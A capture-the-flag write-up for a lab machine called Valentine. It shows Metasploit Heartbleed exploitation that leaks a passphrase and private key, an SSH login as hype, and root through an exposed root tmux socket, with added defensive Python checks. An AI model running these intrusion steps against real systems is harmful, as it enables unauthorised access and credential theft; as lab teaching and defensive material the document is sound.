Valentine

Enumeration

NMAP

The nmap scan reveals three open services: SSH on port 22, HTTP on port 80 and HTTPS (Apache over OpenSSL) on port 443.

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-05-13T09:00:42+00:00; +3m55s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 3m54s

Dirbuster

Dirbuster reveals a /dev/ directory that contains two files of interest.

/dev/hype_key

Contains a hex-encoded RSA private key.

/dev/notes

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

Exploit w/ Metasploit

The first thing we see on the index page is a woman and a bleeding heart, which is a hint at the OpenSSL vulnerability called Heartbleed.

I first run the Metasploit auxiliary module to check whether the host is vulnerable, then switch the module's action to DUMP to read leaked memory from the server.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > exploit

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 10.10.10.79:443       - Heartbeat response with leak, 65535 bytes
[+] 10.10.10.79:443       - Heartbeat data stored in /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
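The leak happens because the unpatched server trusts the payload length declared inside the heartbeat message instead of the length of the record it actually received. The following added example (mine, not from the original post or from Metasploit) implements that missing bounds check as a validator over a TLS heartbeat record, the same inequality a patched OpenSSL or an IDS rule applies; the two sample records are constructed.

```python
import struct

TLS_HEARTBEAT = 0x18      # TLS record content type for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16          # RFC 6520: at least 16 bytes of random padding


def check_heartbeat_record(record: bytes) -> dict:
    """Parse one TLS record and validate the heartbeat message inside it.

    The verdict is 'malformed-heartbleed-style' when the payload_length
    declared inside the message is larger than what the record carries.
    That is the condition unpatched OpenSSL never tested, so it copied
    payload_length bytes from its own heap into the reply.
    """
    if len(record) < 5:
        return {"verdict": "truncated-record"}
    content_type, _version, rec_len = struct.unpack("!BHH", record[:5])
    if content_type != TLS_HEARTBEAT:
        return {"verdict": "not-heartbeat"}
    body = record[5:5 + rec_len]
    if rec_len < 3 or len(body) < rec_len:
        return {"verdict": "truncated-record"}
    hb_type, declared = struct.unpack("!BH", body[:3])
    available = rec_len - 3          # bytes left for payload + padding
    result = {"type": hb_type, "declared": declared, "available": available}
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        result["verdict"] = "bad-type"
    elif declared + MIN_PADDING > available:
        # RFC 6520 says: discard silently. The patched OpenSSL check is
        # `1 + 2 + payload + 16 > rrec.length`, the same inequality.
        result["verdict"] = "malformed-heartbleed-style"
    else:
        result["verdict"] = "ok"
    return result


# Constructed sample records (TLS 1.1 version bytes 0x0302), 23-byte body each.
# A well-formed request: 4-byte payload "ping" plus 16 bytes of padding.
BENIGN = b"\x18\x03\x02\x00\x17" + b"\x01\x00\x04" + b"ping" + b"\x00" * 16
# The same bytes on the wire, but the message claims a 64-byte payload.
OVERSIZED = b"\x18\x03\x02\x00\x17" + b"\x01\x00\x40" + b"ping" + b"\x00" * 16
```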

Running strings over the binary file dumped by the Heartbleed module reveals a base64-encoded text parameter, apparently submitted through the site's decode.php page.

$ sudo strings /root/.msf4/loot/20210513073901_default_10.10.10.79_openssl.heartble_912349.bin
[sudo] password for kali: 
0&J/
u8DF
ux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Referer: https://127.0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
.Dl[
/m:t w
wHXpq
N[xckM
t]Sd
fwF)u`
1MC&
P0N0
["lr
["lr
'760{pu
.Dl[
/m:t w
wHXpq
N[xckM                

The decoded value is heartbleedbelievethehype, which I guess is a passphrase.

$ printf "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
heartbleedbelievethehype

Next I list the other actions this module offers.

msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DUMP  Dump memory contents to loot
   KEYS  Recover private keys from memory
   SCAN  Check hosts for vulnerability


msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 10.10.10.79:443       - Scanning for private keys
[*] 10.10.10.79:443       - Getting public key constants...
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Starting.
[*] 10.10.10.79:443       - 2021-05-13 11:42:28 UTC - Attempt 0...
[+] 10.10.10.79:443       - 2021-05-13 11:42:30 UTC - Got the private key
[*] 10.10.10.79:443       - -----BEGIN RSA PRIVATE KEY-----
...snip...
-----END RSA PRIVATE KEY-----

[*] 10.10.10.79:443       - Private key stored in /root/.msf4/loot/20210513074230_default_10.10.10.79_openssl.heartble_001596.txt
[*] 10.10.10.79:443       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Now that I had a passphrase and a private key, I tried to log in with usernames such as admin, bleed, heart, heartbleed, bleedheart, valentine and others. In the end I had to go back over my enumeration to see where I had gone wrong, and figured out that I had missed something. The /dev/ directory contains a second file called hype_key, which not only holds a hex-encoded private key but whose name also tells me that the key's owner is hype. I ran the hex value through a hex-to-text converter and received a second private key. All that was left was to copy the private key to a file, change its permissions to 600 and SSH to the box as hype with the previously found passphrase.

# ssh -i web_key hype@10.10.10.79
Enter passphrase for key 'web_key': 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
[email protected]:~$ 
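The hype_key file is an ordinary PEM private key that was only hex-encoded, which is enough to hide it from a naive grep for "BEGIN ... PRIVATE KEY" on the web root. As an added check (mine, not from the original post), the following scanner finds long hex runs in served content, decodes them and reports any PEM private key inside, together with whether it is passphrase-protected as hype_key was; the sample files are constructed and the embedded key is a placeholder, not a real key.

```python
import re

# A hex run of at least 64 byte-pairs (PEM armour alone is longer), allowing
# whitespace between pairs and requiring non-alphanumeric characters around it
# so the pairs are not read mis-aligned from a neighbouring word.
HEX_RUN = re.compile(r"(?<![0-9A-Za-z])(?:[0-9a-fA-F]{2}\s*){64,}(?![0-9A-Za-z])")
PEM_KEY = re.compile(r"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.*?)-----END \1-----", re.S)


def find_hex_encoded_keys(text: str) -> list:
    """Decode each long hex run in `text` and report PEM private keys inside.

    A finding holds the PEM label, whether the block carries the legacy
    'Proc-Type: 4,ENCRYPTED' header (a passphrase is still required, as it
    was for hype_key) and the offset of the hex run in the input.
    """
    findings = []
    for m in HEX_RUN.finditer(text):
        try:
            decoded = bytes.fromhex(re.sub(r"\s+", "", m.group(0))).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not textual: hashes, binary blobs and the like
        for key in PEM_KEY.finditer(decoded):
            findings.append({
                "offset": m.start(),
                "label": key.group(1),
                "encrypted": "Proc-Type: 4,ENCRYPTED" in key.group(2),
            })
    return findings


# Constructed placeholder: the body is not a real key.
PLACEHOLDER_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
    "PLACEHOLDERNOTAREALKEYBODY=\n"
    "-----END RSA PRIVATE KEY-----\n"
)
# Two constructed "served files": one with a bare hex blob, one with spaced
# byte pairs like hype_key, plus a hex run that is not text at all.
SAMPLE_BARE = "<pre>\n" + PLACEHOLDER_PEM.encode().hex() + "\n</pre>"
SAMPLE_SPACED = " ".join(f"{b:02x}" for b in PLACEHOLDER_PEM.encode())
SAMPLE_BINARY = "deadbeef" * 20
```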

There are many ways to achieve root on this machine. The output of linuxprivchecker.py revealed SUID files of interest, a root-owned tmux process running on the socket /.devs/dev_sess, and a kernel vulnerable to DirtyCow, among others. I chose the tmux route to save some time.

[email protected]:~/Desktop$ ps aux
...snip...
root       1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
...snip...

[email protected]:~/Desktop$ tmux -S /.devs/dev_sess
[email protected]:/home/hype/Desktop# whoami
root
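The root shell comes from a tmux server that root left running on a socket another user could connect to: whoever can write to the socket gets a shell as the server's user. As an added audit (mine, not from the original post), the following parses ps output for tmux -S sockets and flags root-owned ones whose mode lets group or other write to them; the ps lines and stat results are constructed so it runs offline, and mode_of can be swapped for the default os.stat-based lookup on a real host.

```python
import os
import re
import stat

TMUX_SOCKET = re.compile(r"\btmux\b.*?\s-S\s+(\S+)")


def parse_ps(ps_output: str) -> list:
    """Return (user, pid, socket_path) for every 'tmux -S <path>' in ps aux output."""
    found = []
    for line in ps_output.splitlines():
        parts = line.split(None, 10)       # 11th field is the full command line
        if len(parts) < 11:
            continue
        m = TMUX_SOCKET.search(parts[10])
        if m:
            found.append((parts[0], int(parts[1]), m.group(1)))
    return found


def default_mode_of(path: str) -> int:
    return os.stat(path).st_mode


def exposed_tmux_sockets(ps_output: str, mode_of=default_mode_of) -> list:
    """Flag sockets of root tmux servers that are writable by group or other."""
    flagged = []
    for user, pid, path in parse_ps(ps_output):
        try:
            mode = mode_of(path)
        except OSError:
            continue                       # socket gone, or not reachable by the auditor
        if not stat.S_ISSOCK(mode) or user != "root":
            continue
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            flagged.append({"pid": pid, "socket": path, "mode": oct(stat.S_IMODE(mode))})
    return flagged


# Constructed ps aux excerpt and socket modes standing in for os.stat.
PS_SAMPLE = """USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root       1020  0.0  0.1  26416  1672 ?        Ss   01:59   0:05 /usr/bin/tmux -S /.devs/dev_sess
hype       2001  0.0  0.1  26416  1672 ?        Ss   02:10   0:00 tmux -S /tmp/tmux-1000/default
root       2100  0.0  0.0  12345   900 ?        S    02:11   0:00 /usr/bin/tmux -S /run/tmux/private
"""
MODES = {
    "/.devs/dev_sess": stat.S_IFSOCK | 0o660,          # group-writable: exposed
    "/tmp/tmux-1000/default": stat.S_IFSOCK | 0o700,   # hype's own server
    "/run/tmux/private": stat.S_IFSOCK | 0o700,        # root, owner-only
}


def constructed_mode_of(path: str) -> int:
    if path not in MODES:
        raise FileNotFoundError(path)
    return MODES[path]
```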
